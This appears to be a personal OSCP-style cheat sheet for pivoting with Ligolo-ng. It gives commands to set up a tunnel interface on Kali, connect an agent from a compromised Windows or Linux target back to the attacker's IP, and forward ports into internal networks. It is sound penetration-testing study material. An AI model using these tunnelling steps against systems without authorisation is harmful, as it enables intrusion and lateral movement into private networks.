Ligolo

Guide Basic usage From Kali:

1. sudo ip tuntap add user pop mode tun ligolo
2. sudo ip link set ligolo up
3. sudo ip route add $targetIP.0/24 dev ligolo
4. sudo ./proxy -selfcert

From Windows Target (agent file):

1. .\ligolo.exe -connect $kaliIP:11601 -ignore-cert

OR

From Linux Target (agent file):

1. ./ligolo -connect $kaliIP:11601 -ignore-cert

Then from Kali:

1. session
2. 1
3. Start
   1. listener_add --addr 0.0.0.0:5555 --to 127.0.0.1:6666 This allows you to access port 5555 on target from 127.0.0.1:6666 (kali machine).

Local Port Forwarding: - ip route add 240.0.0.1/32 dev ligolo - 240.0.0.1 will point to whatever machine Ligolo-ng has an active tunnel on.

Other tools

While the OSCP Lab discusess other tools such as socat, sshuttle, and plink, I found that Ligolo-ng was able to provide all of the same functionality and more simply. That said, I am linking a guide discusess the other tools. Here is frankyyano’s Pivoting & Tunneling guide.

Tips

Port scanning through a tunnel can take a while, and it may be only TCP scans that work so no UDP or ICMP